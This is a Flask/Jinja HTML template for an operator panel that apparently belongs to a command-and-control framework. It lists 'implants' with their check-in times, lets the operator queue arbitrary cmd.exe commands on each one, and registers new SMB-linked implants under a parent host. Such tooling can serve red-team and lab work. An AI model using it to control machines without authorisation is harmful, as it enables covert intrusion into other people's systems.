<!-- webpage for admin to see various data about implants -->
<!doctype html>
<link rel= "stylesheet" type= "text/css" href="{{ url_for('static' ,filename='app.css') }}">
<title>Monitor</title>

<ul>
    <li><a href="/monitor" class="active">Monitor</a></li>
    <li><a href="/tasktable">Tasks</a></li>
    <li><a href="/nodegraph">Graphs</a></li>
</ul>

<br>
{% for implant in implants %}
<div class="implant">
    <h2>{{implant[0]}}</h2>
    <p>Pending Tasks: {{implant[1]}}</p>
    <p>Last check-in: {{implant[2]}}</p>
    <p>Creation Date: {{implant[3]}}</p>
    <form method="post" action="/createtask/{{implant[0]}}">
        <label for="command">Enter a valid cmd.exe command:</label>
        <input type="Command" name="command" required="true" placeholder="whoami">
        <input type="submit" value="Create Task" />
    </form>
</div>
{% endfor %}

<form action='/smbregister' method='POST' style="text-align:center; margin: 10vh;">
    <label for="hostname">New Implant Hostname</label>
    <input type='text' name='hostname' id='hostname' placeholder='DESKTOP-XXXXXX' style="padding: 10px; margin: 5px;"></input> <br/>
    <label for="parent hostname">Parent Hostname</label>
    <input type='text' name='parent' id='parent' placeholder='LAPTOP-XXXXXX' style="padding: 10px; margin: 5px;"></input> <br/>
    <input type='submit' name='submit' style="padding: 5px; margin: 5px; width: 48%;"></input>
</form>